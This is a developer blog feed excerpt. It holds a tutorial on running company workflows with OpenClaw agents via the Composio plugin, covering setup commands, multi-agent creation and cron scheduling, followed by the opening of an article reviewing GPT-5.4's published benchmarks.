&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3j5c227mzou0xz0n0j38.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3j5c227mzou0xz0n0j38.png" alt="Openclaw running an entire company architecture" width="800" height="600"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;As you can see, most day-to-day operations of running a company, such as sales, team meetings, and customer care, can be managed with OpenClaw Agents. And there are many more than just the ones in the image, of course. This is just a quick sketch to give you an idea.&lt;/p&gt;


&lt;h2&gt;
  
  
  Problem with "Just OpenClaw"
&lt;/h2&gt;

&lt;p&gt;By default, OpenClaw works with API keys, and it stores them in a plain text file in the &lt;code&gt;~/.openclaw/&lt;/code&gt; directory for all the services you use, such as Google, Gmail, and so on. That is not great practice if you're running this on your local machine. On something like a VPS or the hyped &lt;strong&gt;Mac Mini&lt;/strong&gt; it's a bit safer, but storing credentials in a plain text file is never a good idea.&lt;/p&gt;

&lt;p&gt;Smaller models especially are more prone to prompt injection, and since OpenClaw has full system access, a successful injection could wipe out your entire system without you doing anything.&lt;/p&gt;

&lt;p&gt;What's actually gone wrong in the wild (already):&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Malicious skills on ClawHub:&lt;/strong&gt; researchers found hundreds to thousands of skills that were straight-up malware or had critical issues, including credential theft and prompt injection patterns.&lt;/li&gt;
&lt;/ul&gt;



&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Prompt injection turning into installs:&lt;/strong&gt; there's been at least one high-profile incident where a prompt injection was used to push OpenClaw onto machines via an agent workflow.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fo215wy0xag7t8z86ogzv.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fo215wy0xag7t8z86ogzv.jpg" alt="OpenClaw compromised" width="800" height="379"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;For the above reasons, I recommend using a hosted integration service, which in my case is &lt;strong&gt;Composio&lt;/strong&gt;. It lets you authenticate using OAuth, which is far more secure than pasting keys locally.&lt;/p&gt;


&lt;h2&gt;
  
  
  Connecting your first app
&lt;/h2&gt;

&lt;p&gt;Now, it's time to create agents, but first, we need to set up or connect our first app from Composio.&lt;/p&gt;

&lt;p&gt;The agents will mostly revolve around working with those applications from Composio.&lt;/p&gt;
&lt;h3&gt;
  
  
  1. Install Composio Plugin
&lt;/h3&gt;

&lt;p&gt;Composio's OpenClaw plugin connects OpenClaw to Composio's MCP endpoint and exposes third-party tools (GitHub, Gmail, Slack, Notion, etc.) through that layer.&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openclaw plugins &lt;span class="nb"&gt;install&lt;/span&gt; @composio/openclaw-plugin
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h3&gt;
  
  
  2. Composio Plugin Setup
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;Log in at &lt;a href="https://dashboard.composio.dev/" rel="noopener noreferrer"&gt;dashboard.composio.dev&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Choose OpenClaw as the client.&lt;/li&gt;
&lt;li&gt;Copy your consumer key (&lt;code&gt;ck_...&lt;/code&gt;) from the Composio dashboard settings, then set it:&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F982ctfxsvbsd8d1dsmmk.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F982ctfxsvbsd8d1dsmmk.jpg" alt="Composio OpenClaw setup instructions" width="800" height="213"&gt;&lt;/a&gt;&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openclaw config &lt;span class="nb"&gt;set &lt;/span&gt;plugins.entries.composio.config.consumerKey &lt;span class="s2"&gt;"ck_your_key_here"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Now, it's a good idea to restart the gateway:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openclaw gateway restart
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h3&gt;
  
  
  3. Verify the plugin loaded
&lt;/h3&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openclaw plugins list
openclaw logs &lt;span class="nt"&gt;--follow&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;You're looking for something like "Composio loaded" and a "tools registered" message.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fce73szhae07paumt96ae.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fce73szhae07paumt96ae.jpg" alt="OpenClaw successfully loads Composio" width="800" height="219"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If the plugin is &lt;strong&gt;"loaded"&lt;/strong&gt;, it means you can now successfully access Composio.&lt;/p&gt;

&lt;p&gt;Here's how it works:&lt;/p&gt;

&lt;p&gt;The plugin connects to Composio's MCP server at &lt;code&gt;https://connect.composio.dev/mcp&lt;/code&gt; and registers all available tools directly into the OpenClaw agent. Tools are called by name — no extra search or execute steps needed.&lt;/p&gt;

&lt;p&gt;If a tool returns an auth error, the agent will prompt you to connect that toolkit at &lt;a href="https://dashboard.composio.dev/" rel="noopener noreferrer"&gt;dashboard.composio.dev&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Here's how the configuration looks:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"plugins"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"entries"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"composio"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="nl"&gt;"enabled"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="nl"&gt;"config"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
          &lt;/span&gt;&lt;span class="nl"&gt;"consumerKey"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"ck_your_key_here"&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;You can configure the following options directly from the config file:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;enabled&lt;/code&gt;: enable or disable the plugin&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;consumerKey&lt;/code&gt;: your Composio consumer key&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;mcpUrl&lt;/code&gt;: the MCP server URL. By default, it's &lt;code&gt;https://connect.composio.dev/mcp&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;
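For example, if you route traffic through your own MCP-compatible proxy, the optional `mcpUrl` override would look like this (a sketch based on the options above; the proxy URL is a made-up placeholder):

```json
{
  "plugins": {
    "entries": {
      "composio": {
        "enabled": true,
        "config": {
          "consumerKey": "ck_your_key_here",
          "mcpUrl": "https://mcp-proxy.internal.example.com/mcp"
        }
      }
    }
  }
}
```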

&lt;p&gt;Previously, you had to configure API keys per integration, but with Composio you don't have to worry about any of that. Just make sure &lt;strong&gt;not to leak&lt;/strong&gt; the consumer key that we generated.&lt;/p&gt;

&lt;p&gt;And it's that simple. Everything works out of the box just as you would use any other OpenClaw plugin!&lt;/p&gt;

&lt;p&gt;Now, to test if it works, head over to the Control UI chat and send a message, something like:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"List the Composio tools you have available."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fryuiqg0zcs7udhjqn44a.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fryuiqg0zcs7udhjqn44a.png" alt="OpenClaw listing composio tools" width="800" height="358"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If it asks you to connect the tools, head over to &lt;a href="https://dashboard.composio.dev/" rel="noopener noreferrer"&gt;dashboard.composio.dev&lt;/a&gt; and connect each of the tools you require. It's as simple as clicking &lt;strong&gt;Connect&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fecgu1xvvw1qzz27q5ymt.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fecgu1xvvw1qzz27q5ymt.jpg" alt="Adding integrations in Composio" width="800" height="420"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;All the integrations you use are OAuth-hosted, and only the tools you connect will be available to OpenClaw. Nothing more than that.&lt;/p&gt;


&lt;h2&gt;
  
  
  Setting up a Multi-Agent Team
&lt;/h2&gt;

&lt;p&gt;The idea is pretty clear: since a single agent can't handle every kind of company requirement due to &lt;strong&gt;context window limitations&lt;/strong&gt;, you can run multiple sub-agents, one per task type.&lt;/p&gt;

&lt;p&gt;Say AgentA handles marketing, AgentB handles business analysis, and AgentC handles something else entirely.&lt;/p&gt;

&lt;p&gt;Each agent has a distinct role, personality, and model optimized for its use case — say, for business analysis, you'd want a more research-oriented model like GPT-5.2.&lt;/p&gt;

&lt;p&gt;And how do you create them? It's simple: just chat with OpenClaw itself, either in the chat window or your configured channel.&lt;/p&gt;

&lt;p&gt;Example:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Please create a new agent called **Shri**. This agent should be capable of handling tasks such as reading and composing emails, and scheduling Google Meet sessions.

For the model, use **Claude Sonnet 4.6** (`claude-sonnet-4-6`).

Please ensure that the existing main agent remains untouched and unchanged.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fd5r5jl6vv59m9a9tv8tb.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fd5r5jl6vv59m9a9tv8tb.jpg" alt="Prompt in OpenClaw" width="800" height="417"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And it will create a new agent, which you can view in the &lt;code&gt;Agents&lt;/code&gt; tab in the OpenClaw dashboard or by running &lt;code&gt;/agents&lt;/code&gt; in the OpenClaw TUI.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvbr7ukxn72n1y7fyejgu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvbr7ukxn72n1y7fyejgu.png" alt="OpenClaw agents" width="800" height="417"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Repeat this for each of your work types, creating a separate agent for each one.&lt;/p&gt;

&lt;p&gt;The main agent can then delegate work to those specialized agents, each handling one specific task type, which improves response quality because one agent is handling one type of work instead of everything at once.&lt;/p&gt;
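Conceptually, the delegation boils down to routing each task type to its own agent and model. Here's a minimal, purely illustrative Python sketch; the agent names, task types, and model labels are hypothetical, not OpenClaw's actual API:

```python
# Illustrative sketch of task-type routing across specialized agents.
# OpenClaw's real delegation happens internally -- these agent names,
# task types, and model labels are made up for illustration.

AGENTS = {
    "marketing": {"name": "AgentA", "model": "small-cheap-model"},
    "business_analysis": {"name": "AgentB", "model": "research-oriented-model"},
    "email": {"name": "Shri", "model": "claude-sonnet-4-6"},
}

def route(task_type: str) -> dict:
    """Pick the specialized agent for a task type, falling back to the main agent."""
    return AGENTS.get(task_type, {"name": "main", "model": "default-model"})

print(route("email")["name"])         # Shri
print(route("unknown-task")["name"])  # main
```

The point of the fallback is that the main agent always stays the catch-all, so adding or removing specialists never leaves a task type unhandled.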

&lt;blockquote&gt;
&lt;p&gt;💡 &lt;strong&gt;TIP:&lt;/strong&gt; This also helps you reduce model usage costs, as you can assign more reasoning-heavy models to complex tasks and smaller, cheaper models to simpler ones.&lt;/p&gt;
&lt;/blockquote&gt;


&lt;h2&gt;
  
  
  What's Missing?
&lt;/h2&gt;

&lt;p&gt;Everything seems good, but there's one thing missing... &lt;strong&gt;autonomy&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;You still have to message OpenClaw manually to get things done, which isn't ideal when you're planning on using it as an AI employee.&lt;/p&gt;

&lt;p&gt;There are two ways to achieve this:&lt;/p&gt;
&lt;h3&gt;
  
  
  1. If you're a little technical
&lt;/h3&gt;

&lt;p&gt;If you're familiar with cron jobs and their syntax, you can set this up directly from the CLI, outside of OpenClaw's chat interface.&lt;/p&gt;

&lt;p&gt;Run the following command:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openclaw cron add &lt;span class="nt"&gt;--schedule&lt;/span&gt; &lt;span class="s2"&gt;"&amp;lt;cron_syntax&amp;gt;"&lt;/span&gt; &lt;span class="nt"&gt;--message&lt;/span&gt; &lt;span class="s2"&gt;"&amp;lt;prompt&amp;gt;"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Say you want it running every single day at 9 AM:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openclaw cron add &lt;span class="nt"&gt;--schedule&lt;/span&gt; &lt;span class="s2"&gt;"0 9 * * *"&lt;/span&gt; &lt;span class="nt"&gt;--message&lt;/span&gt; &lt;span class="s2"&gt;"&amp;lt;prompt&amp;gt;"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
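If the five-field cron syntax is new to you, this small self-contained Python sketch (unrelated to OpenClaw's internals) shows how an expression like `0 9 * * *` is read:

```python
from datetime import datetime

def cron_matches(expr: str, when: datetime) -> bool:
    """Check a datetime against a simplified 5-field cron expression.

    Fields: minute hour day-of-month month day-of-week.
    Only '*' and plain numbers are supported -- enough to read "0 9 * * *"
    as "every day at 09:00". Real cron also supports ranges, lists, and
    steps, and numbers day-of-week from Sunday=0 (Python's weekday() uses
    Monday=0), so this sketch only handles '*' reliably in that field.
    """
    fields = expr.split()
    values = [when.minute, when.hour, when.day, when.month, when.weekday()]
    return all(f == "*" or int(f) == v for f, v in zip(fields, values))

# "0 9 * * *" fires at 09:00 every day:
print(cron_matches("0 9 * * *", datetime(2026, 4, 16, 9, 0)))   # True
print(cron_matches("0 9 * * *", datetime(2026, 4, 16, 10, 0)))  # False
```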

&lt;h3&gt;
  
  
  2. If you're not technical
&lt;/h3&gt;

&lt;p&gt;Similar to how we used a prompt to create a new agent, all you need to do is write a prompt:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Every morning at 9 AM, send me the top news of the day. Also scan my Google Calendar for the day, identify each attendee and their company. Send me two different messages on Telegram: one with the news summary and one with the meeting details.

Use the relevant Agent you have for each purpose.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;blockquote&gt;
&lt;p&gt;💁 There's also a similar concept called Heartbeat, which is another approach for scheduling tasks in OpenClaw. You can check it out here: &lt;a href="https://docs.openclaw.ai/gateway/heartbeat" rel="noopener noreferrer"&gt;OpenClaw Heartbeat&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;


&lt;h2&gt;
  
  
  Workflow Demo
&lt;/h2&gt;

&lt;p&gt;Okay, time for a demo.&lt;/p&gt;

&lt;p&gt;Showing an entire workflow demo of running a company would be too much work, so for this demo, I will show you one part of the workflow: checking the calendar and messaging a summary with attendees every day at a set time.&lt;/p&gt;

&lt;p&gt;You could have it run every X hours or every single day at a fixed time. At each interval, the model does exactly what the prompt describes (obviously, the idea is naive, but it's just for this demo). The possibilities are endless.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Keep this in mind: “anything that you can do manually on the internet, you can automate with OpenClaw.” So, you get the idea.&lt;/p&gt;

&lt;p&gt;💁 &lt;strong&gt;NOTE:&lt;/strong&gt; If you're serious about this idea, it's better to run this on a VPS or a Mac Mini, because you mostly don't have your personal PC running 24/7.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Here's the demo:&lt;/p&gt;

&lt;p&gt;  &lt;iframe src="https://www.youtube.com/embed/3WZ5PkqyCyc"&gt;
  &lt;/iframe&gt;
&lt;/p&gt;


&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;So far, you've learned how to run a fully functioning company with just yourself and a bunch of &lt;strong&gt;OpenClaw agents&lt;/strong&gt;, using &lt;strong&gt;Composio&lt;/strong&gt; as the secure integration layer between OpenClaw and all your third-party apps.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Be sure to give a star to &lt;a href="https://github.com/ComposioHQ/composio" rel="noopener noreferrer"&gt;&lt;strong&gt;Composio&lt;/strong&gt;&lt;/a&gt; and &lt;a href="https://github.com/openclaw/openclaw" rel="noopener noreferrer"&gt;&lt;strong&gt;OpenClaw&lt;/strong&gt;&lt;/a&gt; on their GitHub repositories.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;If you found this article helpful, drop a like and share your thoughts in the comments below. 👇&lt;/p&gt;

&lt;p&gt;Happy automating! 🥳&lt;/p&gt;


&lt;div class="ltag__user ltag__user__id__1127015"&gt;
    &lt;a href="/shricodev" class="ltag__user__link profile-image-link"&gt;
      &lt;div class="ltag__user__pic"&gt;
        &lt;img src="https://media2.dev.to/dynamic/image/width=150,height=150,fit=cover,gravity=auto,format=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1127015%2F1c5e48a2-f602-4e7d-8312-3c0322d155c6.jpg" alt="shricodev image"&gt;
      &lt;/div&gt;
    &lt;/a&gt;
  &lt;div class="ltag__user__content"&gt;
    &lt;h2&gt;
&lt;a class="ltag__user__link" href="/shricodev"&gt;Shrijal Acharya&lt;/a&gt;Follow
&lt;/h2&gt;
    &lt;div class="ltag__user__summary"&gt;
      &lt;a class="ltag__user__link" href="/shricodev"&gt;Full Stack SDE • Open-Source Contributor • Collaborator @Oppia • Mail for collaboration&lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;



</description>
      <category>ai</category>
      <category>productivity</category>
      <category>openclaw</category>
      <category>tutorial</category>
    </item>
    <item>
      <title>Everything you need to know about OpenAI GPT-5.4 ✌️</title>
      <dc:creator>Shrijal Acharya</dc:creator>
      <pubDate>Sat, 21 Mar 2026 14:08:05 +0000</pubDate>
      <link>https://dev.to/tensorlake/everything-you-need-to-know-about-openai-gpt-54-3lgm</link>
      <guid>https://dev.to/tensorlake/everything-you-need-to-know-about-openai-gpt-54-3lgm</guid>
      <description>&lt;p&gt;OpenAI’s new GPT-5.4 is here, and on paper at least, it looks like one of their strongest all-rounder models so far.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fg2rrzzlrqx2wc2szp0do.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fg2rrzzlrqx2wc2szp0do.png" alt="GPT 5.4 release blog" width="800" height="252"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  TL;DR
&lt;/h2&gt;

&lt;p&gt;In this article, we take a quick look at OpenAI GPT-5.4, go through its official benchmarks, and then compare it in one small coding task against Anthropic’s general-purpose model, Claude Sonnet 4.6, to see how it actually performs.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;We briefly go over what GPT-5.4 is, what OpenAI is claiming with this model, and why it looks like one of their strongest all-rounder releases so far.&lt;/li&gt;
&lt;/ul&gt;



&lt;ul&gt;
&lt;li&gt;We look at the official benchmarks around coding, reasoning, tool use, and computer-use capabilities to get an idea of how strong the model looks on paper.&lt;/li&gt;
&lt;/ul&gt;



&lt;ul&gt;
&lt;li&gt;Instead of relying only on benchmarks, we also compare GPT-5.4 against Claude Sonnet 4.6 in one small, quick coding task (not enough to judge fully, but still...).&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Brief on OpenAI GPT-5.4
&lt;/h2&gt;

&lt;p&gt;So, before we jump into the coding test, let me give you a quick brief on GPT-5.4, because this is one of OpenAI’s biggest model releases in a while.&lt;/p&gt;

&lt;p&gt;OpenAI released GPT-5.4 on March 5, 2026, and they are positioning it as their most capable and efficient frontier model for professional work.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgjgdtgurct57gfvfsblk.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgjgdtgurct57gfvfsblk.png" alt="OpenAI claiming gpt 5.4 is good at frontend" width="800" height="200"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;What makes this model interesting is that OpenAI is not selling it as just a coding model, and not just a reasoning model either. They are basically pitching it as an &lt;strong&gt;all-round professional work&lt;/strong&gt; model that combines strong reasoning, strong coding, better tool use, and much better performance on practical work like spreadsheets, presentations, etc.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkfmlidftq907s3rk2c1l.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkfmlidftq907s3rk2c1l.png" alt="Sam Altman claiming the model is good at real life tasks like working with spreadsheets" width="800" height="440"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Honestly, this part matters more than it sounds. A lot of real AI work is not just prompting or writing code, it is dealing with PDFs, spreadsheets, slides, and all kinds of unstructured data. That is also where something like &lt;a href="https://tensorlake.ai" rel="noopener noreferrer"&gt;Tensorlake&lt;/a&gt; makes sense, because it helps turn that mess into something models can actually work with.&lt;/p&gt;

&lt;p&gt;And the specs are also pretty wild. GPT-5.4 supports a &lt;strong&gt;1.05M token&lt;/strong&gt; context window with 128K max output tokens, which is plenty of room to work with; in practice, it can keep far more of a codebase or conversation in view at once. Also, a thing to note is that the knowledge cutoff for this model is &lt;strong&gt;August 31, 2025&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Now, let's talk about the part we mostly care about.&lt;/p&gt;

&lt;p&gt;On the official OpenAI benchmarks, &lt;strong&gt;GPT-5.4 scores 57.7% on SWE-Bench Pro (Public)&lt;/strong&gt;, which puts it basically side by side with GPT-5.3-Codex, a coding-focused model, at &lt;strong&gt;56.8%&lt;/strong&gt;. So yes, OpenAI says this general-purpose model slightly edges out its dedicated coding model (one I personally have not had the best experience with compared to Claude models), and that is kind of wild to think about.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fn6yjg9ftpq3vexntmndl.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fn6yjg9ftpq3vexntmndl.png" alt="gpt 5.4 benchmark" width="800" height="386"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;OpenAI says GPT-5.4 is their &lt;strong&gt;first general-purpose model with native computer-use capabilities&lt;/strong&gt;, which is a pretty big deal. That means it is built not just to generate text or code, but also to operate across software, work from screenshots, and handle more agent-like workflows. On &lt;strong&gt;OSWorld-Verified&lt;/strong&gt;, it scores &lt;strong&gt;75.0%&lt;/strong&gt;, which OpenAI says is above human performance on that benchmark. 🤯&lt;/p&gt;

&lt;p&gt;One thing I also like here is that OpenAI is claiming GPT-5.4 is their &lt;strong&gt;most factual model yet&lt;/strong&gt;. It is said to be 18% less likely to contain any errors compared to GPT-5.2.&lt;/p&gt;

&lt;p&gt;For API developers, pricing matters, of course.&lt;/p&gt;

